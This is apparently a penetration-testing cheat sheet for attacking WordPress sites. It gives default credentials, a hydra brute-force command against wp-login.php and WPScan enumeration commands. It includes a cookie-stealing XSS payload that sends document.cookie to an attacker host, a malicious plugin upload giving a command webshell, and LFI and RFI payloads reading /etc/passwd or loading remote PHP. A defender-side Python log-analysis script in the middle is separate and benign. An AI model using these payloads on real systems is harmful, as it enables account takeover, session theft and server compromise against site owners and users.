Exploiting Wordpress

Brute-Forcing Login Credentials:

# Default Password
admin/admin or admin/password

# BruteForce
hydra -l admin -P wordlist.txt <target> http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:Invalid username"

Enumerating with WPScan:

  • Plugins: wpscan --url <target> --enumerate p

  • Themes: wpscan --url <target> --enumerate t

  • Users: wpscan --url <target> --enumerate u

  • Vulnerabilities: wpscan --url <target> --enumerate vp,vt

Exploiting Vulnerable Plugins:

# Check /wp-content/plugins/
curl http://<target>/wp-content/plugins/readme.txt

# Look for exploit on searchsploit
searchsploit <plugin_name> <version>

# LiteSpeed Cache (<= 5.7, CVE-2023-40000): 
<script>document.location='http://<attacker_ip>/steal?cookie='+document.cookie;</script>

Uploading a Malicious Plugin:

  • Dashboard > Plugins > Add New > Upload Plugin

  • Create backdoor.php, zip it:

  • Upload, activate, access: http://<target>/?cmd=whoami

Exploiting XML-RPC for DoS or Brute-Force:
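
The brute-force, WPScan enumeration and XML-RPC activity described above each leave a distinctive trace in the web server's access log. The following Python script is an added defender-side example, not code from the original page: it parses Apache/nginx "combined" format log lines (an assumed format; the addresses, timestamps, user agents and plugin names in `SAMPLE_LOG` are constructed, not real traffic) and flags clients that repeatedly POST to `/wp-login.php` or `/xmlrpc.php` inside a short window, as well as clients that collect 404s on many distinct plugin directories, which is what plugin enumeration looks like from the server side. The window and threshold values are assumptions to tune for your site.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache/nginx "combined" access-log format (assumed; adjust LOG_RE for other formats).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample log, not real traffic: one client hammering wp-login.php,
# one legitimate login, one client hammering xmlrpc.php, and the first client
# also probing plugin directories that do not exist.
SAMPLE_LOG = """
203.0.113.5 - - [10/Oct/2023:13:55:00 +0000] "POST /wp-login.php HTTP/1.1" 200 4312 "-" "python-requests/2.31"
203.0.113.5 - - [10/Oct/2023:13:55:03 +0000] "POST /wp-login.php HTTP/1.1" 200 4312 "-" "python-requests/2.31"
203.0.113.5 - - [10/Oct/2023:13:55:06 +0000] "POST /wp-login.php HTTP/1.1" 200 4312 "-" "python-requests/2.31"
203.0.113.5 - - [10/Oct/2023:13:55:09 +0000] "POST /wp-login.php HTTP/1.1" 200 4312 "-" "python-requests/2.31"
203.0.113.5 - - [10/Oct/2023:13:55:12 +0000] "POST /wp-login.php HTTP/1.1" 200 4312 "-" "python-requests/2.31"
203.0.113.5 - - [10/Oct/2023:13:55:15 +0000] "POST /wp-login.php HTTP/1.1" 200 4312 "-" "python-requests/2.31"
198.51.100.7 - - [10/Oct/2023:13:56:00 +0000] "POST /wp-login.php HTTP/1.1" 200 4312 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2023:13:56:20 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Oct/2023:14:01:00 +0000] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "curl/8.0"
203.0.113.9 - - [10/Oct/2023:14:01:01 +0000] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "curl/8.0"
203.0.113.9 - - [10/Oct/2023:14:01:02 +0000] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "curl/8.0"
203.0.113.9 - - [10/Oct/2023:14:01:03 +0000] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "curl/8.0"
203.0.113.9 - - [10/Oct/2023:14:01:04 +0000] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "curl/8.0"
203.0.113.5 - - [10/Oct/2023:14:10:00 +0000] "GET /wp-content/plugins/alpha-plugin/ HTTP/1.1" 404 196 "-" "WPScan"
203.0.113.5 - - [10/Oct/2023:14:10:00 +0000] "GET /wp-content/plugins/beta-plugin/ HTTP/1.1" 404 196 "-" "WPScan"
203.0.113.5 - - [10/Oct/2023:14:10:01 +0000] "GET /wp-content/plugins/gamma-plugin/readme.txt HTTP/1.1" 404 196 "-" "WPScan"
203.0.113.5 - - [10/Oct/2023:14:10:01 +0000] "GET /wp-content/plugins/delta-plugin/ HTTP/1.1" 404 196 "-" "WPScan"
203.0.113.5 - - [10/Oct/2023:14:10:02 +0000] "GET /wp-content/plugins/installed-plugin/readme.txt HTTP/1.1" 200 1204 "-" "WPScan"
""".strip().splitlines()


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["path"] = rec["path"].split("?", 1)[0]  # ignore the query string
    rec["status"] = int(rec["status"])
    return rec


def max_in_window(times, window):
    """Largest number of events that fall inside any interval of length `window`."""
    times = sorted(times)
    best = start = 0
    for end, t in enumerate(times):
        while t - times[start] > window:
            start += 1
        best = max(best, end - start + 1)
    return best


def find_login_abuse(lines, window=timedelta(seconds=60), threshold=5):
    """Flag clients that POST to /wp-login.php or /xmlrpc.php at least `threshold`
    times inside `window`. WordPress answers a failed login with HTTP 200 (the form
    is re-rendered with an error) and a successful one with a 302 redirect, so only
    200 responses are counted for wp-login.php. Returns {(ip, path): count}."""
    buckets = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST":
            continue
        if rec["path"] == "/wp-login.php" and rec["status"] == 200:
            buckets[(rec["ip"], rec["path"])].append(rec["ts"])
        elif rec["path"] == "/xmlrpc.php":
            buckets[(rec["ip"], rec["path"])].append(rec["ts"])
    findings = {}
    for key, times in buckets.items():
        n = max_in_window(times, window)
        if n >= threshold:
            findings[key] = n
    return findings


PLUGIN_RE = re.compile(r"^/wp-content/plugins/([^/]+)/")


def find_plugin_enumeration(lines, threshold=3):
    """Flag clients that receive 404s for at least `threshold` distinct plugin
    directories: the server-side signature of a scanner guessing installed plugins.
    Returns {ip: number_of_missing_plugin_dirs}."""
    missing = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["status"] != 404:
            continue
        m = PLUGIN_RE.match(rec["path"])
        if m:
            missing[rec["ip"]].add(m.group(1))
    return {ip: len(names) for ip, names in missing.items() if len(names) >= threshold}


if __name__ == "__main__":
    for (ip, path), n in find_login_abuse(SAMPLE_LOG).items():
        print(f"{ip}: {n} POSTs to {path} within 60s")
    for ip, n in find_plugin_enumeration(SAMPLE_LOG).items():
        print(f"{ip}: 404s on {n} distinct plugin directories")
```

Feed real log lines into `find_login_abuse` and `find_plugin_enumeration` to get the offending client addresses; rate-limiting or blocking at the reverse proxy, or disabling `xmlrpc.php` if it is not needed, closes the gap the flagged activity is probing.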

Cross-Site Scripting (XSS) via Plugins:

  • WP Statistics (<= 14.5, CVE-2024-2194): <script>alert('XSS');</script>

  • Steal cookies: <script>document.location='http://<attacker_ip>/steal?cookie='+document.cookie;</script>

phpMyAdmin:

  • root/root or admin/admin

  • SQL injection in login page

LFI/RFI:

  • LFI: ?page=../../../../etc/passwd

  • RFI: ?page=http://<attacker>/malicious.php

Inject webshell using SQL query:

Refer to https://www.hackingarticles.in/shell-uploading-web-server-phpmyadmin/
